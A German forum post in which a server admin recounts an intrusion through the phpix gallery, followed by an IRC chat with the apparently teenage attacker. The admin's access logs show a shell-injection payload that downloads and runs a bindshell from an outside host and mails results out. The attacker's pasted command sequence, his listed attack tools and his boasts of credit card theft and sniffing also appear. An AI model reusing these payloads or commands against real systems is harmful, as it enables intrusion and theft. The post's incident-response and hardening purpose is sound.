12.02.2004
Bei routinemäßigem 'ps aux' auf meinem Rootserver fiel mir etwas komisches auf: der User www6, der eigentlich keinen ssh-Zugriff und -Kenntnis hat, hatte gcc am Kompilieren und zwei weitere Prozesse laufen: zbind und ./tmp.
Da mir diese Sache sehr eigenartig vorkam, gleich ein 'kill -9 pid' gemacht und alle Prozesse gekillt. Danach Suche in Google nach zbind, die Suche war jedoch relativ erfolglos.
Ein cat /var/www/www6/log/access_log | grep wget brachte dann folgendes heraus:
Code: Select all
213.233.93.85.dial.xnet.ro - - [10/Feb/2004:21:48:11 +0100] "GET
/gallery/index.php?mode=view&album=Kreiskongress+21.02.2003&pic=DSCF0012.JPG&dis
psize=`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20c
d%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com`&start=0 HTTP/1.1" 200
1112 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
80.97.208.113 - - [10/Feb/2004:21:49:54 +0100] "GET
/gallery/index.php?mode=view&album=Kreiskongress+21.02.2003&pic=DSCF0012.JPG&dis
psize=`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20c
d%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com`&start=0 HTTP/1.1" 200
1073 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
80.97.208.113 - - [10/Feb/2004:21:49:55 +0100] "GET
/gallery/generated/Kreiskongress%2021.02.2003/DSCF0012__scaled_`cd%20/var/tmp;%2
0wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%
20|%20mail%20merlin_uta@yahoo.com`.jpg HTTP/1.1" 404 497
"http://www.server.de/gallery/index.php?mode=view&album=Kreiskongress+21.02.2
003&pic=DSCF0012.JPG&dispsize=`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20
tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com
`&start=0" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
80.97.208.113 - - [10/Feb/2004:21:50:13 +0100] "GET
/gallery/generated/Kreiskongress%2021.02.2003/DSCF0012__scaled_`cd%20/var/tmp;%2
0wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%
20|%20mail%20merlin_uta@yahoo.com`.jpg HTTP/1.1" 404 497
"http://www.server.de/gallery/index.php?mode=view&album=Kreiskongress+21.02.2
003&pic=DSCF0012.JPG&dispsize=`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20
tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com
`&start=0" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"http://www.tecchannel.de/sicherheit/reports/2015.html
Okay, ein wget plasture.go.ro/za.tgz gemacht und in die Datei reingekuckt: zbind und zero! In /var/tmp fanden sich dann auch ein psybnc-Verzeichnis und ein Verzeichnis ohne Namen.
Ebenso finde ich eine Datei mit dem Namen kaka.tgz, in ihr folgender netter Inhalt:
Code: Select all
-rwxr-xr-x 1 autoresp 500 130 Dec 23 14:11 .drdos
-rwxr-xr-x 1 autoresp 500 93694 Feb 10 00:08 a
-rw-rw-r-- 1 autoresp 500 3556 Feb 10 00:16 all.log
-rwxr-xr-x 1 autoresp 500 132720 Feb 10 00:08 apach-scan.1
-rw-r--r-- 1 autoresp 500 469 Dec 20 14:28 as8758.net
-rwxr-xr-x 1 autoresp 500 441463 Feb 10 00:08 brk
-rw-r--r-- 1 autoresp 500 42 Jan 13 03:33 bucate
-rw------- 1 autoresp 500 106496 Jan 13 03:32 core
-rwxr-xr-x 1 autoresp 500 26692 Feb 10 00:08 dmntreal
-rwxr-xr-x 1 autoresp 500 264608 Feb 10 00:08 ipv6fuck
-rw-r--r-- 1 autoresp 500 15905 Jul 7 2003 ipv6fuck.c
-rw-r--r-- 1 autoresp 500 45 Jan 22 04:49 kaka.tgz
-rwxr-xr-x 1 autoresp 500 453572 Feb 10 00:08 megaDoS
drwxr-xr-x 2 autoresp 500 4096 Jan 13 04:53 synscan
-rw-r--r-- 1 autoresp 500 47127 Dec 19 23:12 wget-log
-rwxr-xr-x 1 autoresp 500 132720 Jan 22 00:12 xIn der psybnc.conf dann folgende Einträge:
Code: Select all
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
USER1.USER.LOGIN=perseu
USER1.USER.USER=dominic
USER1.USER.PASS==16`e`a`K'm'C'O`Q09
USER1.USER.RIGHTS=1
USER1.USER.VLINK=0
USER1.USER.PPORT=0
USER1.USER.PARENT=0
USER1.USER.QUITTED=0
USER1.USER.ACOLLIDE=0
USER1.USER.DCCENABLED=1
USER1.USER.AIDLE=0
USER1.USER.LEAVEQUIT=0
USER1.USER.AUTOREJOIN=1
USER1.USER.SYSMSG=1
USER1.USER.LASTLOG=0
USER1.USER.AWAYNICK=sculam3nt
USER1.USER.AWAY=sunt un sculoi
USER1.USER.NICK=sculam3nt
USER1.SERVERS.SERVER1=eu.undernet.org
USER1.SERVERS.PORT1=6667
USER1.CHANNELS.ENTRY0=#pandispanDen Rest gibts nun hier zu lesen:
Code: Select all
Session Start: Thu Feb 12 20:03:38 2004
Session Ident: #pandispan
[20:03:38] * Now talking in #pandispan
[20:03:38] * Topic is 'jjj'
[20:03:38] * Set by pandispan on Thu Feb 12 17:57:29
[20:03:52] * Disconnected
[20:04:08] * Attempting to rejoin channel #pandispan
[20:04:08] * Rejoined channel #pandispan
[20:04:08] * Topic is 'jjj'
[20:04:08] * Set by pandispan on Thu Feb 12 17:57:29
[20:04:11] * hot_babe (hot_babe@213.233.68.149) Quit (Read error: Connection reset by peer)
[20:04:14] <ich> this is nice
[20:04:17] <ich> here are the hackers
[20:04:35] <ich> just found a psybnc which was compiling itself on my server
[20:04:38] <ich> very well done
[20:04:43] * AmigoXp (~AmigoXp@AmigoXp.users.undernet.org) Quit (Read error: Connection reset by peer)
[20:05:36] <ich> cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz
[20:05:40] <ich> u know that
[20:07:33] <@pandispan> tu cine esti
[20:07:50] <ich> USER1.USER.LOGIN=perseu
[20:07:55] <ich> USER1.USER.USER=dominic
[20:08:25] * pandispan sets mode: +b *!*@p508C10B7.dip0.t-ipconnect.de
[20:08:31] * You were kicked by pandispan (who are you?)
[20:08:31] * Attempting to rejoin channel #pandispan
[20:08:31] * Unable to join channel (address is banned)
[20:08:57] #pandispan Cannot send to channel
[20:08:58] #pandispan Cannot send to channel
[21:02:54] * Attempting to rejoin channel #pandispan
[21:02:54] * Unable to join channel (address is banned)
Session Close: Thu Feb 12 21:04:56 2004Code: Select all
Session Start: Thu Feb 12 20:08:11 2004
Session Ident: pandispan
[20:08:11] * Logging pandispan to 'logsUnderNetpandispan.20040201.log'
[20:08:15] <ich> who i am?
[20:08:22] <ich> a guy u tried to hack i guess
[20:08:28] <ich> USER1.USER.PASS==16`e`a`K'm'C'O`Q09
[20:08:36] <ich> USER1.USER.AWAYNICK=sculam3nt
[20:08:41] <ich> USER1.USER.AWAY=sunt un sculoi
[20:08:45] <ich> USER1.USER.NICK=sculam3nt
[20:09:00] <ich> USER1.USER.NICK=sculam3nt
[20:09:04] <pandispan> ?
[20:09:08] <ich> cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.com
[20:09:13] <ich> found that in my logs
[20:09:26] <ich> wgot that file and looked at it
[20:09:30] <ich> and killed zbind
[20:09:35] <ich> and killed tmp
[20:09:42] <ich> and deleted ./var/tmp//
[20:09:43] <pandispan> hahahahahahah
[20:09:50] <ich> is there something else?
[20:10:00] <pandispan> your an admin
[20:10:04] <ich> why are you doing this?
[20:10:10] <pandispan> smth with server.de wright?
[20:10:15] <ich> thats right
[20:10:16] <ich> wow
[20:10:23] <ich> safe mode on now
[20:10:28] <pandispan> good 4 you
[20:10:30] <ich> can u help me secure my server?
[20:10:36] <ich> i am very impressed
[20:11:02] <pandispan> yet again,good 4 you
[20:11:05] <ich> i was looking at ps aux
[20:11:15] <pandispan> you`re happy you achieved such a thing right?
[20:11:20] <ich> and saw sth compiling
[20:11:23] <ich> not very happy
[20:11:33] <ich> because i thought the server was secure
[20:11:41] <pandispan> well,for fun i guess,i won't fuck up your server dude
[20:11:50] <pandispan> well oke
[20:11:52] <pandispan> i'll help
[20:12:02] <pandispan> on one condition
[20:12:05] <pandispan> i'll help you
[20:12:05] <ich> okay
[20:12:07] <pandispan> ?
[20:12:12] <ich> condition?
[20:12:34] <ich> i thought i am good at linux :)
[20:12:53] <pandispan> listen,i'll help you secure your server on one condition
[20:12:58] <ich> ok i liste
[20:13:15] <pandispan> that you just keep a bnc
[20:13:18] <pandispan> for me
[20:13:26] <pandispan> always
[20:13:27] <ich> why should i do that?
[20:13:35] <pandispan> yea man,a psybnc like that tmp i putted
[20:13:45] <ich> why should i trust you?
[20:13:49] <pandispan> lol
[20:13:54] <pandispan> do you agree?
[20:14:03] <ich> i asked a question
[20:14:06] <pandispan> all i want is a really stable bnc
[20:14:20] <ich> for doing more of that stuff?
[20:14:28] <ich> u know there are laws
[20:14:38] <ich> and if something happens I am responsible
[20:14:39] <pandispan> if you want me to help you secure your server
[20:14:51] <ich> you think i am a newbie
[20:15:07] <pandispan> no
[20:15:12] <pandispan> believe me
[20:15:14] <pandispan> i am romanian
[20:15:18] <ich> i know
[20:15:28] <pandispan> dude,compared to a romanian you are
[20:16:00] <pandispan> so were were we
[20:16:02] <ich> i am??
[20:16:10] <pandispan> there are la thousands of bouncers
[20:16:18] <ich> yers
[20:16:19] <ich> yes
[20:16:22] <pandispan> it's not at all dangerous
[20:16:33] <ich> this is crazy
[20:16:43] <ich> u want me to keep a bouncer for you
[20:16:47] <pandispan> just your word to keep that bnc for me as long as the server is onlain
[20:16:49] <ich> after u tried to hack my server
[20:16:52] <pandispan> if you want my help
[20:17:08] <pandispan> i can like put down your server if am a nasty man
[20:17:17] <pandispan> but i won;t
[20:17:26] <pandispan> i have about a hundred sites
[20:17:27] <pandispan> or more
[20:17:34] <ich> oh u mean ddos
[20:17:36] <pandispan> wich i got a few days ago
[20:17:46] <ich> is that a sport for you?
[20:17:47] <pandispan> i don't like to do damage
[20:18:03] <pandispan> entering servers is kind of a hobby
[20:18:18] <pandispan> i dont do damage,i repeat,i dont do damage
[20:18:49] <ich> this is good :)
[20:18:56] <pandispan> so,will you keep a bnc for me or not?
[20:19:01] <pandispan> koz it's not at all dangerous
[20:19:09] <ich> after we secured 'our' server
[20:19:18] <ich> i want to see what you will do
[20:19:24] <ich> what do u suggest?
[20:19:35] <pandispan> ha?
[20:19:52] <ich> what do u sugesst for securing
[20:20:01] <ich> u give i take i give u take
[20:20:04] <ich> its that easy
[20:20:15] <pandispan> i can suggest a few things
[20:20:23] <pandispan> only if you promise to keep it for me
[20:20:48] <ich> lets see what you sugesst
[20:20:53] <pandispan> hahaha
[20:21:05] <pandispan> do you promise or do you not?
[20:22:33] <ich> go on
[20:22:51] <pandispan> omg
[20:22:53] <pandispan> just tell me
[20:23:03] <pandispan> if you agree to keep a bnc for me
[20:23:04] <pandispan> or not
[20:23:51] <ich> ok
[20:24:13] <pandispan> really really?
[20:24:18] <ich> ok
[20:24:25] <pandispan> wtf,i eint got nothin to lose
[20:24:34] <ich> right
[20:24:36] <ich> me too :)
[20:24:39] <ich> ok go on
[20:24:43] <pandispan> what is your kernel version by the way ?
[20:25:26] <ich> 2.4.23
[20:25:29] <pandispan> anyway,for the moment it can't be rooted
[20:25:32] <ich> without do_brk
[20:25:49] <ich> and grsecurity patcehs
[20:25:50] <pandispan> just upgrade it to be safe
[20:26:01] <ich> whats in the 2.4.24?
[20:26:02] <pandispan> remove the wget command
[20:26:14] <pandispan> and remove phpix from your server
[20:26:18] <ich> yes i do
[20:26:22] <ich> and safe mode?
[20:26:28] <pandispan> it's as vulnerable as 2.4.23
[20:26:28] <ich> but i have suphp
[20:26:44] <ich> and i saw that the server user was compiling sth
[20:26:46] <pandispan> i don;t think that is vulnerable
[20:27:00] <ich> what could you have done with zbind?
[20:27:07] <pandispan> yea,i was compiling the bouncer
[20:27:17] <pandispan> well,zbind opens up the server
[20:27:22] <pandispan> a tty on port 4000
[20:27:27] <pandispan> i enter
[20:27:36] <pandispan> and i root it if the kernel version is vulnerable
[20:27:50] <pandispan> if not,i place a bnc for fun
[20:27:54] <pandispan> and leave it alone
[20:28:06] <ich> crazy
[20:28:15] <ich> how many machines do you have?
[20:28:30] <pandispan> many
[20:28:37] <pandispan> a great deal
[20:28:47] <pandispan> well not that many,:)
[20:28:48] <pandispan> about 100
[20:28:51] <pandispan> or more
[20:29:06] <ich> be honest: why do you do that?
[20:29:14] <pandispan> but next month i'll get a new remote exploit probably and get much more
[20:29:26] <pandispan> dude ,for fune
[20:29:35] <pandispan> it's not like i do any damage
[20:29:52] <pandispan> mostly after i become root,no one notices me
[20:30:02] <pandispan> a few months ago
[20:30:07] <ich> i see
[20:30:09] <pandispan> i owned a credit card portal
[20:30:33] <pandispan> thousands of credit cards went through there daily
[20:30:45] <pandispan> i kept it a few weeks,nobody could notice me
[20:30:48] <ich> is that that famous hacking mentality? not to do any damage?
[20:30:51] <pandispan> then i forgot the pass
[20:30:52] <ich> this is really hard
[20:30:55] <pandispan> smth like that;0
[20:31:35] <ich> sounds interesting
[20:31:36] <pandispan> not really
[20:31:39] <ich> whats your age?
[20:31:51] <pandispan> it's very hard to understand a haacker if you're not one
[20:31:56] <pandispan> specially a romanian oen
[20:31:58] <pandispan> one
[20:32:03] <pandispan> we are really special people
[20:32:23] <ich> i read many things about hackers
[20:32:32] <ich> u know the german film '23'?
[20:32:33] <pandispan> but mostly we hack for 2 or 3 reasons
[20:32:39] <ich> they are?
[20:32:40] <pandispan> 15
[20:32:50] <pandispan> 1. we hack to put bouncers or bots
[20:32:52] <pandispan> 2. for cc's
[20:33:04] <ich> ccs? dont know that
[20:33:12] <pandispan> 3.to sniff,that's another joy but not really a reason
[20:33:22] <ich> sniffing is looking in network packets?
[20:33:48] <ich> what are ccs?
[20:33:49] <pandispan> nope
[20:34:28] <pandispan> credit card
[20:34:28] <pandispan> s
[20:34:30] <ich> ah ok
[20:34:41] <pandispan> anyway,there's nothing compared to romanians
[20:34:46] <pandispan> smth like that
[20:34:59] <ich> whats so special about romanians?
[20:35:00] <ich> tell me
[20:35:06] <ich> i am always interested
[20:35:12] <pandispan> i place smth wich logs all who enter the server
[20:35:17] <pandispan> and there passwds
[20:35:25] <ich> ah ok thats sniffing
[20:35:33] <pandispan> so i can enter every linux box that enters the server
[20:35:51] <ich> uhm?
[20:35:53] <ich> what?
[20:36:18] <pandispan> ?/
[20:36:40] <pandispan> anyway i sugest you visit romania
[20:36:46] <ich> if i got time
[20:36:50] <pandispan> the land of everything
[20:36:54] <ich> at the moment i am doing studies
[20:37:00] <pandispan> kind of a jungle
[20:37:08] <pandispan> but the coolest place in the univers
[20:37:43] <pandispan> it would take years
[20:37:48] <pandispan> it's like a jungle coz the strongest survives
[20:38:05] <ich> is there something else to secure the server? fuck php, its very nice but insecure... but safemode should do it right?
[20:38:06] <pandispan> you can't get rich if you don't steal or comit fraud
[20:38:10] <ich> wow
[20:38:14] <ich> are u sure?
[20:38:25] <pandispan> it's verry difficult to explain
[20:38:27] <ich> 15 years old and this kind of thoughts???
[20:38:45] <pandispan> the aura of "manele"
[20:38:53] <pandispan> is a very special thing
[20:38:55] <ich> whats that?
[20:39:00] <pandispan> human language cannot describe it
[20:39:26] <ich> okay i see
[20:39:34] <ich> whats that kaka.tgz inside your file?
[20:40:26] <pandispan> no good
[20:40:31] <ich> i know
[20:40:31] <pandispan> you have to see it to believe it:)
[20:40:37] <pandispan> anyway how about that bnc
[20:40:38] <ich> be honest
[20:40:47] <ich> tell me everything what you did
[20:41:02] <ich> then we can talk about bnc
[20:41:38] <pandispan> dude,you don't really need safemode
[20:41:49] <pandispan> thank you very much:)
[20:42:06] <ich> what?
[20:42:30] <pandispan> what's what
[20:42:31] <pandispan> ?
[20:42:38] <ich> [20:41:38] <pandispan> dude,you don't really need safemode
[20:42:43] <ich> what dya mean?
[20:42:56] <ich> i just wanted to know what u did
[20:43:20] <pandispan> anyway the only way to enter your server is through phpix
[20:43:29] <pandispan> a openssl scanner
[20:43:35] <pandispan> a friend gave it to me
[20:43:36] <ich> zbind
[20:43:41] <pandispan> he asked me to scan for him
[20:43:59] <pandispan> anyway the only way to enter your server is through phpix and i developed this method a few weeks ago
[20:44:10] <pandispan> and told it to about 3-4 friends
[20:44:16] <ich> dont understand... with the openssl scanner u found my server
[20:45:00] <ich> register_globals off should also be good i think?
[20:45:07] <ich> dude, you woke me up
[20:45:16] <ich> i believed that thing was secure
[20:45:37] <pandispan> you want the exact commands i typed ?
[20:45:44] <ich> yes plz
[20:46:04] <pandispan> so,i planted the zbind
[20:46:06] <pandispan> i enterd
[20:46:09] <pandispan> uname -a
[20:46:11] <pandispan> cd /var/tmp
[20:46:12] <pandispan> ls -a
[20:46:14] <pandispan> rm -rf z*
[20:46:28] <pandispan> wget iwonttellyouwantsite.com/loginx.tar.gz
[20:46:33] <pandispan> tar xzvf loginx.tar.gz
[20:46:36] <pandispan> ./loginx
[20:46:42] <pandispan> it did not work
[20:46:49] <pandispan> coz your kernel iz new
[20:46:51] <pandispan> so
[20:46:57] <pandispan> rm -rf log*
[20:47:01] <pandispan> mkdir ' '
[20:47:02] <pandispan> cd ' '
[20:47:05] <ich> oh a you wanted to root it
[20:47:08] <ich> that dir i found
[20:47:09] <pandispan> wget blablabla.com/psybnc.tgz
[20:47:14] <pandispan> tar xzvf psybnc.tgz
[20:47:20] <pandispan> mv psybnc tm
[20:47:22] <pandispan> tmp
[20:47:24] <pandispan> cd tmp
[20:47:24] <pandispan> make
[20:47:27] <pandispan> mv psybnc tmp
[20:47:29] <pandispan> ./tmp
[20:47:31] <ich> there i saw u
[20:47:34] <ich> 'make'
[20:47:41] <pandispan> these are the exact commands i typed
[20:47:47] <pandispan> and then i putet kaka.tgz
[20:47:51] <pandispan> which is a scanner
[20:47:53] <ich> and tmp was the bnc
[20:47:56] <pandispan> that doesnt work
[20:48:05] <pandispan> coz you dont have the necessary libraries
[20:48:10] <pandispan> i planted the bnc
[20:48:17] <pandispan> and 2minutes later you killed it
[20:48:51] <pandispan> you told me safemode would do the trick
[20:48:57] <ich> i am amazed
[20:49:04] <pandispan> honestly i dont really know what the fuck is safe mode
[20:49:10] <ich> oh
[20:49:13] <ich> i explain
[20:49:16] <pandispan> listen,as long as i can't become root
[20:49:26] <pandispan> i cant do anything to your server
[20:49:28] <ich> u got into with php which runs under suphp
[20:49:41] <ich> and php knows safe mode and register globals
[20:49:51] <ich> and it means to be "secure"
[20:50:01] <ich> if there is any security in the world *g*
[20:50:06] <pandispan> what's with the zbind?
[20:50:13] <pandispan> wanna see it's source
[20:50:14] <pandispan> ?
[20:50:17] <ich> i read that u dont need safemode if using suphp
[20:50:20] <ich> yes plz
[20:51:26] <pandispan> nooo
[20:51:30] <pandispan> with google
[20:51:31] <ich> what?
[20:51:32] <pandispan> i typed phpix
[20:51:40] <pandispan> i enter through phpix
[20:51:48] <pandispan> openssl exploits are like 3 years old
[20:52:05] <pandispan> lol
[20:52:07] <pandispan> chill
[20:52:13] <pandispan> nobody can enter your server
[20:52:17] <pandispan> if you take of phpix
[20:52:23] <ich> yes 013004 there was a news here
[20:52:24] <ich> http://www.tecchannel.de/sicherheit/reports/2015.html
[20:52:27] <ich> just read it
[20:52:31] <ich> sry its german
[20:52:57] <ich> its crazy we both are chatting eh?
[20:53:48] <pandispan> i can recommend a good song 4 you
[20:53:52] <pandispan> manele style
[20:54:02] <ich> ok ... type that in kazaa
[20:54:02] <pandispan> take it of kazaa if you have time
[20:54:05] <ich> lol
[20:54:12] <pandispan> to understand some of the mentality of romanians
[20:54:16] <pandispan> 4 nopti si 4 zile
[20:54:19] <pandispan> liviu guta
[20:54:26] <pandispan> 4 nopti si 4 zile - is the name of the song
[20:54:32] <ich> ok i search
[20:55:08] <ich> what about the bnc?
[20:55:15] <ich> does this have to be?
[20:55:26] <ich> u have hundreds of bncs
[20:55:42] <ich> i just rented that server to host some friends on it
[20:55:53] <pandispan> ?
[20:56:06] <ich> yeah i feel insecure to give u a bnc on it
[20:56:14] <ich> to someone i dont know
[20:56:22] <ich> u know what i mean?
[20:56:28] <pandispan> no
[20:56:33] <pandispan> i was compiling the bnc
[20:56:52] <pandispan> i tried to root yor server a few days ago
[20:57:01] <ich> i saw
[20:57:09] <pandispan> yes
[20:57:12] <ich> 213.233.93.85.dial.xnet.ro - - [10/Feb/2004:21:48:11 +0100]
[20:57:13] <ich> and?
[20:57:32] <ich> why didnt u?
[20:58:16] <pandispan> ?/?
[20:58:25] <ich> today we have feb 12
[20:58:30] <ich> that was at feb 10
[20:58:36] <ich> %
[20:58:36] <ich> 213.233.93.85.dial.xnet.ro - - [10/Feb/2004:21:48:11 +0100] "GET /gallery/index.php?mode=view&album=Kreiskongress+21.02.2003&pic=DSCF0012.J
[20:58:36] <ich> PG&dispsize=`cd%20/var/tmp;%20wget%20plasture.go.ro/za.tgz;%20tar%20xzvf%20za.tgz;%20cd%20za;./zbind;ls%20-a%20|%20mail%20merlin_uta@yahoo.
[20:58:36] <ich> com`&start=0 HTTP/1.1" 200 1112 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
[20:58:47] <ich> where are the today logs?
[20:58:54] <ich> sure u didntdo anything else?
[20:59:47] <ich> or do u have that tty since the day before yesterday?
[21:00:00] <pandispan> well in phpix
[21:00:08] <ich> yes?
[21:00:12] <pandispan> when you visit the site
[21:00:16] <pandispan> and wanna see a pic
[21:00:51] <pandispan> at the end,the link is smth like pic.jpg&dispsize=number&start=0
[21:01:00] <ich> i know how u gut in
[21:01:09] <ich> u attaced shell commands
[21:01:10] No such nick
[21:01:15] <ich> but
[21:01:15] No such nick
[21:01:31] <ich> :)
[21:01:31] No such nick
Session Close: Thu Feb 12 21:04:56 2004Und weg war er....
Der Server ist wieder sauber, Safe_Mode auf On und register_globals auf Off! Entgegen der Aussage in http://www.rootforum.org/forum/viewtopi ... p+safemode
hab ich Safemode nun wieder aktiviert. Ich hab genau die Sicherheitslücke übrigens gerade ausprobiert und es funktioniert wirklich. Also phpix runterwerfen oder umprogrammieren!
Zusammenfassend:
- Ã?ber Lücke in phpix wird ein binary installiert, welches eine Shell auf Port 4000 öffnet und dem Kiddie eine Mail schickt -> er hat IP-Adresse und kann connecten
- Kiddie zieht sich mehr Sachen, versucht den Server zu rooten
- geht nicht, da neuer Kernel ohne do_brk()-Exploit
- Kiddie installiert psybnc aus Spaß
Einigen Aussagen nach gehe ich davon aus, dass das ein Scriptkiddie war, das nur mal was ausprobieren wollte.
Eines hab ich gelernt:
- immer auf dem neuesten Stand bleiben (Kernelupdate!), zum Glück hab ich den 2.4.23 damals drauf gemacht als das mit dem do_brk() bekannt wurde, sonst hätte er mich gerootet (steht oben im Log irgendwo)!
- Ohne Safemode geht nix, trotz suphp!
- php immer als CGI laufen lassen!
Ich hoffe, dieser Beitrag hilft einigen, Schaden zu vermeiden! Nette Story oder?
EDIT: Ich habe mir nicht ernsthaft Tips erwartet, das sieht im Log nur teilweise so aus. Wollte wissen wie weit der Typ wirklich geht!
HTH
ffl
